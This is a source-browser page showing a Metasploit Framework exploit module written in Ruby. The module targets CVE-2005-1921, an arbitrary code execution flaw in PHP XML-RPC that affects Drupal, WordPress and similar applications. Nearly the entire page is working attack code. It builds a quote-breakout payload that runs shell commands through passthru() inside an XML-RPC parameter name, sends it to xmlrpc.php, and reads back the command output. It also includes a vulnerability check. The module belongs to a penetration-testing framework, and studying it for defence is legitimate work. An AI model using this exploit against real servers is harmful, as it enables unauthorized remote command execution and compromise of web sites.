php_xmlrpc_eval.rb

Revision 5709, 3.3 kB (checked in by hdm, 4 days ago)
This massive commit changes the metasploit 3 module format. The new syntax allows for greater scalability and future improvements to the metasploit module loader. This change also makes it easier for users to add new modules, since the class name no longer needs to match the directory structure.
Property svn:eol-style set to `native` Property svn:keywords set to `Rev Revision Id Header`

Line
1	##
2	# $Id$
3	##
4
5	##
6	# This file is part of the Metasploit Framework and may be subject to
7	# redistribution and commercial restrictions. Please see the Metasploit
8	# Framework web site for more information on licensing and terms of use.
9	# http://metasploit.com/projects/Framework/
10	##
11
12
13	require 'msf/core'
14
15
16	class Metasploit3 < Msf::Exploit::Remote
17
18	include Msf::Exploit::Remote::HttpClient
19
20	# XXX This module needs an overhaul
21	def initialize(info = {})
22	super(update_info(info,
23	'Name' => 'PHP XML-RPC Arbitrary Code Execution',
24	'Description' => %q{
25	This module exploits an arbitrary code execution flaw
26	discovered in many implementations of the PHP XML-RPC module.
27	This flaw is exploitable through a number of PHP web
28	applications, including but not limited to Drupal, Wordpress,
29	Postnuke, and TikiWiki.
30	},
31	'Author' => [ 'hdm', 'cazz' ],
32	'License' => MSF_LICENSE,
33	'Version' => '$Revision$',
34	'References' =>
35	[
36	['BID', '14088'],
37	['CVE', '2005-1921'],
38	['MIL', '49'],
39	],
40	'Privileged' => false,
41	'Platform' => ['unix', 'solaris'],
42	'Payload' => {
43	'Space' => 512,
44	'DisableNops' => true,
45	'Keys' => ['cmd', 'cmd_bash'],
46	},
47	'Targets' => [ ['Automatic', { }], ],
48	'DefaultTarget' => 0,
49	'DisclosureDate' => 'Jun 29 2005'
50	))
51
52
53	register_options(
54	[
55	OptString.new('PATH', [ true, "Path to xmlrpc.php", '/xmlrpc.php']),
56	], self.class
57	)
58
59	deregister_options(
60	'HTTP::junk_params', # not your typical POST, so don't inject params.
61	'HTTP::junk_slashes' # For some reason junk_slashes doesn't always work, so turn that off for now.
62	)
63	end
64
65	def go(command)
66
67	encoded = command.unpack("C*").collect{\|x\| "chr(#{x})"}.join('.')
68	wrapper = rand_text_alphanumeric(rand(128)+32)
69
70	cmd = "echo('#{wrapper}'); passthru(#{ encoded }); echo('#{wrapper}');;"
71
72	xml =
73	'<?xml version="1.0"?>' +
74	"<methodCall>" +
75	"<methodName>"+ rand_text_alphanumeric(rand(128)+32) + "</methodName>" +
76	"<params><param>" +
77	"<name>" + rand_text_alphanumeric(rand(128)+32) + "');#{cmd}//</name>" +
78	"<value>" + rand_text_alphanumeric(rand(128)+32) + "</value>" +
79	"</param></params>" +
80	"</methodCall>";
81
82	res = send_request_cgi({
83	'uri' => datastore['PATH'],
84	'method' => 'POST',
85	'ctype' => 'application/xml',
86	'data' => xml,
87	}, 5)
88
89
90	if (res and res.body)
91	b = /#{wrapper}(.*)#{wrapper}/sm.match(res.body)
92	if b
93	return b.captures[0]
94	elsif datastore['HTTP::chunked'] == true
95	b = /chunked Transfer-Encoding forbidden/.match(res.body)
96	if b
97	raise RuntimeError, 'Target PHP installation does not support chunked encoding. Support for chunked encoded requests was added to PHP on 12/15/2005, try disabling HTTP::chunked and trying again.'
98	end
99	end
100	end
101
102	return nil
103	end
104
105	def check
106	response = go("echo ownable")
107	if (!response.nil? and response =~ /ownable/sm)
108	return Exploit::CheckCode::Vulnerable
109	end
110	return Exploit::CheckCode::Safe
111	end
112
113	def exploit
114	response = go(payload.encoded)
115	if response == nil
116	print_status('exploit failed')
117	else
118	if response.length == 0
119	print_status('exploit successful')
120	else
121	print_status("Command returned #{response}")
122	end
123	handler
124	end
125	end
126	end
127

Note: See TracBrowser for help on using the browser.

root/framework3/trunk/modules/exploits/unix/webapp/php_xmlrpc_eval.rb

Download in other formats: